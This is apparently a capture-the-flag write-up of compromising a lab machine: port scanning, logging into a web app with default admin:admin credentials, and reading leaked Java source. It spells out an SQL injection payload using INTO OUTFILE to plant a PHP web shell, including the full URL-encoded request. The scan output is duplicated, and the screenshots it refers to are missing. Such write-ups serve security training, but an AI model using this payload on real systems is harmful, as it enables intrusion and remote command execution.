Target IP: 192.168.171.147
Challenge Description: 1.21 GigHawats.
Running an nmap scan shows there are four TCP ports open on the target machine, as shown above.
22/tcp open ssh OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey:
| 3072 78:2f:ea:84:4c:09:ae:0e:36:bf:b3:01:35:cf:47:22 (RSA)
| 256 d2:7d:eb:2d:a5:9a:2f:9e:93:9a:d5:2e:aa:dc:f4:a6 (ECDSA)
|_ 256 b6:d4:96:f0:a4:04:e4:36:78:1e:9d:a5:10:93:d7:99 (ED25519)
17445/tcp open unknown
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| Cache-Control: no-cache, no-store, max-age=0, must-revalidate
| Pragma: no-cache
| Expires: 0
| X-Frame-Options: DENY
| Content-Type: text/html;charset=UTF-8
| Content-Language: en-US
| Date: Sun, 10 Sep 2023 19:13:11 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <title>Issue Tracker</title>
| <link href="/css/bootstrap.min.css" rel="stylesheet" />
| </head>
| <body>
| <section>
| <div class="container mt-4">
| <span>
| <div>
| href="/login" class="btn btn-primary" style="float:right">Sign In</a>
| href="/register" class="btn btn-primary" style="float:right;margin-right:5px">Register</a>
| </div>
| </span>
| <br><br>
| <table class="table">
| <thead>
| <tr>
| <th>ID</th>
| <th>Message</th>
| <th>P
| HTTPOptions:
| HTTP/1.1 200
| Allow: GET,HEAD,OPTIONS
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| Cache-Control: no-cache, no-store, max-age=0, must-revalidate
| Pragma: no-cache
| Expires: 0
| X-Frame-Options: DENY
| Content-Length: 0
| Date: Sun, 10 Sep 2023 19:13:11 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Sun, 10 Sep 2023 19:13:11 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1></body></html>
30455/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: W3.CSS
50080/tcp open http Apache httpd 2.4.46 ((Unix) PHP/7.4.15)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: W3.CSS Template
|_http-server-header: Apache/2.4.46 (Unix) PHP/7.4.1522/tcp open ssh OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey:
| 3072 78:2f:ea:84:4c:09:ae:0e:36:bf:b3:01:35:cf:47:22 (RSA)
| 256 d2:7d:eb:2d:a5:9a:2f:9e:93:9a:d5:2e:aa:dc:f4:a6 (ECDSA)
|_ 256 b6:d4:96:f0:a4:04:e4:36:78:1e:9d:a5:10:93:d7:99 (ED25519)
17445/tcp open unknown
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| Cache-Control: no-cache, no-store, max-age=0, must-revalidate
| Pragma: no-cache
| Expires: 0
| X-Frame-Options: DENY
| Content-Type: text/html;charset=UTF-8
| Content-Language: en-US
| Date: Sun, 10 Sep 2023 19:13:11 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <title>Issue Tracker</title>
| <link href="/css/bootstrap.min.css" rel="stylesheet" />
| </head>
| <body>
| <section>
| <div class="container mt-4">
| <span>
| <div>
| href="/login" class="btn btn-primary" style="float:right">Sign In</a>
| href="/register" class="btn btn-primary" style="float:right;margin-right:5px">Register</a>
| </div>
| </span>
| <br><br>
| <table class="table">
| <thead>
| <tr>
| <th>ID</th>
| <th>Message</th>
| <th>P
| HTTPOptions:
| HTTP/1.1 200
| Allow: GET,HEAD,OPTIONS
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| Cache-Control: no-cache, no-store, max-age=0, must-revalidate
| Pragma: no-cache
| Expires: 0
| X-Frame-Options: DENY
| Content-Length: 0
| Date: Sun, 10 Sep 2023 19:13:11 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Sun, 10 Sep 2023 19:13:11 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1></body></html>
30455/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: W3.CSS
50080/tcp open http Apache httpd 2.4.46 ((Unix) PHP/7.4.15)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: W3.CSS Template
|_http-server-header: Apache/2.4.46 (Unix) PHP/7.4.15Performing an aggressive nmap scan using the command sudo nmap -sV -A 192.168.171.147 -p 22,17445,30455,50080 against the open ports returns the result above. By the looks of it, there is one SSH on port 22, and the rest of the open ports are running HTTP applications.
Port 17445: HTTP
Browsing to this port displays the webpage above. It looks like some sort of issues tracking application.
I registered a new user with the credentials test:test. And using this new user, I am able to see the different users of this application. One user that stands out to me is clinton, as shown above. I changed the password of the user clinton to test using the Edit button from the image above, but I am unable to perform anything useful. I performed a directory search against this web application and found /login and /register, but I did not find anything useful.
Port 50080: HTTP
The webpage above is shown for this web application.
Doing a directory search against this application returns the result above. The directory /cloud sounds interesting.
Browsing to /cloud returns the login webpage above for this application. It informs me to login, but I have not found any credentials so far.
Using the credentials admin:admin, I gained access to this web application. The webpage above is shown after logging in successfully as the user admin. There are interesting files, such as issuetracker.zip, that I have access to on the target machine.
Opening the issuetracker.zip file displays the contents shown above inside this directory. I also tried uploading a PHP web shell, but I could not access it. Time to enumerate harder. I downloaded the issuetracker.zip file on my machine.
Running tree shows the contents of the Java application above. There are some interesting Java files.
After some enumeration, I found something interesting: the Java class file IssueController contains the juicy information above. Not only does it contain the hard-coded credentials that can be used after exploitation, it looks like the target machine is vulnerable to SQL injection as shown above. The parameter priority can be used with the URL mapping /issue/checkByPriority to perform this SQL injection.
I URL-encoded the payload Normal' UNION SELECT "<?php echo system($_GET['cmd']);" INTO OUTFILE '/srv/http/cmd.php'; -- to upload my PHP webshell.
After URL encoding it, I sent it at
http://192.168.171.147:30455/issue/checkByPriority?priority=Normal%27%20UNION%20SELECT%20%22%3C%3Fphp%20echo%20system%28%24_GET%5B%27cmd%27%5D%29%3B%22%20INTO%20OUTFILE%20%27%2Fsrv%2Fhttp%2Fcmd.php%27%3B%20--%20 to the target machine via POST method as shown above.
And now I can access my webshell, as shown above using the parameter cmd at http://192.168.171.147:30455/cmd.php.
And the proof.txt flag is shown above. GG.